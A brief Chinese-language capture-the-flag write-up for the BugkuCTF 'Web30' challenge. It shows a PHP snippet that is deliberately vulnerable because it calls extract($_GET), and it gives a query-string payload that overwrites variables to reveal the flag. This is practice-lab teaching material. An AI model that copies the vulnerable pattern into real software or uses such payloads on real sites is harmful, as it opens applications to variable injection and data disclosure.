BugkuCTF-Web30-txt????
打开题目,源码如下:
<?phpextract($_GET);if (!empty($ac)){$f = trim(file_get_contents($fn));if ($ac === $f){echo "<p>This is flag:" ." $flag</p>";}else{echo "<p>sorry!</p>";}}?>
题目提示txt???,访问flag.txt,获得

file_get_contents() 把整个文件读入一个字符串中,为了是$ac === $f,构造下列payload即可。
Payload:?ac=bugku&fn=flag.txt

